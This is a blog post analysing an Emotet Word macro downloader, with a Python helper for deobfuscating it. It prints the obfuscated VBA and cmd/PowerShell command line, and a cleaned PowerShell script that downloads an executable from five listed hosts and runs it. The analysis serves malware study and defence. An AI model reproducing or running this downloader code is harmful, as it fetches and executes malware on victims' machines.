Sunday, May 6, 2018

Analysing Word VBA Downloader for Emotet Malware

I found pretty fresh samples of Emotet downloader code from https://www.malware-traffic-analysis.net/2018/05/04/index.html and decided to do a quick deobfuscation of the code.

The first phase is obfuscated VBA code in a Word document. If you open the document, you will see a familiar Office 365 logo, together with prompts to Enable Editing or Enable Content, which would execute the VBA code.


Anyway, the VBA code is pretty heavily obfuscated, with lots of unnecessary code.


Code execution starts from module ujDjvvQ, which is ThisDocument renamed. The module contains an Autoopen function, which can be simplified to:

Sub Autoopen()
 On Error Resume Next
 TiOoQjQV( nFODYizhYv )
End Sub

Function TiOoQjQV contains the Shell call, and the argument passed to it is mostly deobfuscated code.

The deobfuscation function resides in module srYodFmNbnD, and it can be simplified to:

Function OUtvU(ByVal ciUzkrCSLkWBnW As String, TLAaHGLpbjzzY, oYFjLnWNLj)
 On Error Resume Next
 SCXkhnfEKHM = Mid(StrReverse(ciUzkrCSLkWBnW), TLAaHGLpbjzzY, oYFjLnWNLj)
 OUtvU = SCXkhnfEKHM 
End Function

In effect, function OUtvU is a wrapper around the Mid function; the little twist is that the string is first reversed with StrReverse.

The shell function resides in module DnaCdFskcp, and simplified it is:

Sub TiOoQjQV(qFkOSjfj As String)
 On Error Resume Next
 [Shell] Chr(vbKeyC) + qFkOSjfj, 0
End Sub

The argument for the Shell function, i.e. the value of parameter qFkOSjfj, is shown below (Chr(vbKeyC) is "C", so the executed command line begins with "Cmd ..."):

md jVpSwjvTz zCLlIDOdohUVOziMjRLUbTKVir okGWmYP & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %kzwhjFmUVUOiJkk%=kcwKnsUZV&&set %atDQwjOtB%=p&&set %nFODYizhYv%=o^w&&set %lFhJFzoEwJVsjOS%=WdjEbhWvCv&&set %ciUzkrCSLkWBnW%=!%atDQwjOtB%!&&set %iriHrfYMvAFLQXZ%=NaOWDOflQPn&&set %TiOoQjQV%=e^r&&set %SCXkhnfEKHM%=!%nFODYizhYv%!&&set %qFkOSjfj%=s&&set %VtDjlGJSzZpSqTU%=SULNJfBUv&&set %oYFjLnWNLj%=he&&set %TLAaHGLpbjzzY%=ll&&!%ciUzkrCSLkWBnW%!!%SCXkhnfEKHM%!!%TiOoQjQV%!!%qFkOSjfj%!!%oYFjLnWNLj%!!%TLAaHGLpbjzzY%! " . ( $env:comSpeC[4,26,25]-JoIn'')( (('ZmInsa'+'dasd = &('+'g'+'36n'+'g36+g36eg36+g'+'3'+'6'+'w'+'-obj'+'ecg36+g'+'36tg3'+'6'+') random;Z'+'m'+'I'+'YYU = .(g36ne'+'g3'+'6'+'+g'+'36'+'wg36+g36-obj'+'ectg36) Sys'+'tem.Ne'+'t.We'+'bC'+'li'+'ent;'+'Zm'+'INSB ='+' ZmInsa'+'d'+'a'+'sd.nex'+'t(10'+'000, 282'+'1'+'3'+'3);Z'+'mIAD'+'CX'+' = g3'+'6 http'+':'+'//'+'a'+'lian'+'.'+'d'+'e'+'/'+'4wBY'+'ki/@'+'http://agai'+'nstpe'+'rfect'+'ion.net/6'+'kWq0/@'+'ht'+'t'+'p'+'://globalreach'+'adv '+'ertising.'+'com/zfFg'+'SQ/'+'@htt'+'p://www.'+'fanoff.com/Z'+'VljVr/'+'@'+'h'+'ttp'+'://thur'+'tell.co'+'m/TCyk/g'+'3'+'6'+'.S'+'plit(g3'+'6@'+'g'+'3'+'6);ZmI'+'S'+'DC '+'= ZmIe'+'nv:pu'+'bl'+'i'+'c + g3'+'6Dcfg36 +'+' Zm'+'INSB +'+' (g'+'3'+'6'+'.exg36'+'+g3'+'6eg36);fo'+'reach'+'(Z'+'mIasfc'+' '+'in ZmI'+'AD'+'CX){t'+'ry{ZmIYYU.sH6Do'+'0mIWn'+'l0mIOa'+'dFI'+'0mI'+'lesH6('+'ZmI'+'asfc.sH6ToStr0mIi0'+'m'+'INgsH6(),'+' ZmI'+'SDC)'+';&(g36Inv'+'og'+'3'+'6+'+'g36'+'k'+'g'+'36+g36e'+'-It'+'emg36'+')(Z'+'m'+'I'+'SDC'+');bre'+'ak;}catch'+'{}'+'}') -repLACE '0mI',[chaR]96 -repLACE([chaR]68+[chaR]99+[chaR]102),[chaR]92-cREPLACE 'g36',[chaR]39 -cREPLACE ([chaR]90+[chaR]109+[chaR]73),[chaR]36 -cREPLACE ([chaR]115+[chaR]72+[chaR]54),[chaR]34) )

This script has two parts. The first part is batch (cmd.exe) code that creates a folder and sets environment variables whose concatenation evaluates to the string 'powershell'. The second part is obfuscated PowerShell code: it starts with ( $env:comSpeC[4,26,25]-JoIn''), which picks characters 4, 26 and 25 out of the COMSPEC path C:\Windows\system32\cmd.exe, i.e. 'i', 'e', 'x', so the string built by the rest of the expression is handed to iex (Invoke-Expression).

To analyse the PowerShell code, I first made a replace table:

  • 0mI  →  '
  • ZmI  →  $
  • g36  →  '
  • Dcf  →  \
  • sH6  →  *

Finally, I deobfuscated the PowerShell code as follows (the trailing -replace calls excluded):

( $env:comSpeC[4,26,25]-JoIn'')( (('
 $nsadasd = &('new-object') random;
 $YYU = .('new-object') System.Net.WebClient;
 $NSB =$nsadasd.next(10000, 282133);
 $ADCX = '
 http://alian.de/4wBYki/@
 http://againstperfection.net/6kWq0/@
 http://globalreachadvertising.com/zfFgSQ/@
 http://www.fanoff.com/ZVljVr/@
 http://thurtell.com/TCyk/
 '.Split('@');
 $SDC = $env:public + '\' + $NSB + ('.exe');
 foreach($asfc in $ADCX)
 {try{$YYU.*DoWnlOadFIle*($asfc.*ToStriNg*(), $SDC);
 &('Invoke-Item')($SDC); 
 break;}
catch{}})
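As an added example (not code from the post), the following Python script mechanises the replace table: it joins the '...'+'...' pieces of the shell argument, reads each -replace pair (treating -creplace as case-sensitive), decodes the [chaR] codes (96 is a backtick, 92 a backslash, 39 a single quote, 36 a dollar sign, 34 a double quote), applies them in script order and then lists the download URLs. The input is the shell argument quoted above, with the stray space in 'globalreachadv ertising' removed as the author's deobfuscated listing shows.

```python
import re

# The shell argument quoted above, from the "(('ZmInsa" builder to the last -cREPLACE
# (the stray space in "globalreachadv ertising" removed; the rest is copied verbatim).
OBFUSCATED = (
    "(('ZmInsa'+'dasd = &('+'g'+'36n'+'g36+g36eg36+g'+'3'+'6'+'w'+'-obj'+'ecg36+g'"
    "+'36tg3'+'6'+') random;Z'+'m'+'I'+'YYU = .(g36ne'+'g3'+'6'+'+g'+'36'+'wg36+g36-obj'"
    "+'ectg36) Sys'+'tem.Ne'+'t.We'+'bC'+'li'+'ent;'+'Zm'+'INSB ='+' ZmInsa'+'d'+'a'"
    "+'sd.nex'+'t(10'+'000, 282'+'1'+'3'+'3);Z'+'mIAD'+'CX'+' = g3'+'6 http'+':'+'//'+'a'"
    "+'lian'+'.'+'d'+'e'+'/'+'4wBY'+'ki/@'+'http://agai'+'nstpe'+'rfect'+'ion.net/6'"
    "+'kWq0/@'+'ht'+'t'+'p'+'://globalreach'+'adv'+'ertising.'+'com/zfFg'+'SQ/'+'@htt'"
    "+'p://www.'+'fanoff.com/Z'+'VljVr/'+'@'+'h'+'ttp'+'://thur'+'tell.co'+'m/TCyk/g'"
    "+'3'+'6'+'.S'+'plit(g3'+'6@'+'g'+'3'+'6);ZmI'+'S'+'DC '+'= ZmIe'+'nv:pu'+'bl'+'i'"
    "+'c + g3'+'6Dcfg36 +'+' Zm'+'INSB +'+' (g'+'3'+'6'+'.exg36'+'+g3'+'6eg36);fo'"
    "+'reach'+'(Z'+'mIasfc'+' '+'in ZmI'+'AD'+'CX){t'+'ry{ZmIYYU.sH6Do'+'0mIWn'+'l0mIOa'"
    "+'dFI'+'0mI'+'lesH6('+'ZmI'+'asfc.sH6ToStr0mIi0'+'m'+'INgsH6(),'+' ZmI'+'SDC)'"
    "+';&(g36Inv'+'og'+'3'+'6+'+'g36'+'k'+'g'+'36+g36e'+'-It'+'emg36'+')(Z'+'m'+'I'+'SDC'"
    "+');bre'+'ak;}catch'+'{}'+'}') -repLACE '0mI',[chaR]96 -repLACE([chaR]68+[chaR]99"
    "+[chaR]102),[chaR]92-cREPLACE 'g36',[chaR]39 -cREPLACE ([chaR]90+[chaR]109+[chaR]73)"
    ",[chaR]36 -cREPLACE ([chaR]115+[chaR]72+[chaR]54),[chaR]34) )"
)

def ps_value(tok):
    """Evaluate one -replace argument: a 'literal' or a [chaR]N+[chaR]N+... chain."""
    tok = tok.strip(" ()")
    if tok.startswith("'"):
        return tok[1:-1]
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", tok, re.I))

def deobfuscate(expr):
    """Join the '..'+'..' pieces, then run the -replace/-creplace chain in script order."""
    head, *ops = re.split(r"-(c?replace)", expr, flags=re.I)
    text = "".join(re.findall(r"'([^']*)'", head))
    for kind, args in zip(ops[0::2], ops[1::2]):
        old, new = (ps_value(a) for a in args.split(",", 1))
        flags = 0 if kind.lower() == "creplace" else re.I  # -replace ignores case
        text = re.sub(re.escape(old), lambda _: new, text, flags=flags)
    while True:  # collapse the leftover 'ne'+'w'+'-object' style concatenations
        text, n = re.subn(r"'([^']*)'\+'", r"'\1", text)
        if n == 0:
            return text

def payload_urls(script):
    """Return the download list from the '<url>@<url>...'.Split('@') expression."""
    m = re.search(r"'([^']*)'\.Split\('@'\)", script)
    return [u.strip() for u in m.group(1).split("@")] if m else []

if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED), payload_urls(deobfuscate(OBFUSCATED)), sep="\n")
```

The backticks left inside the double-quoted method names are PowerShell escape characters that the interpreter simply drops, so the calls are DownloadFile and ToString.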

The obfuscation method in the VBA code closely resembles the code in: A sample analysis walkthrough with RETouch: Testing a new feature. I guess they are both made with the same malware or obfuscation kit.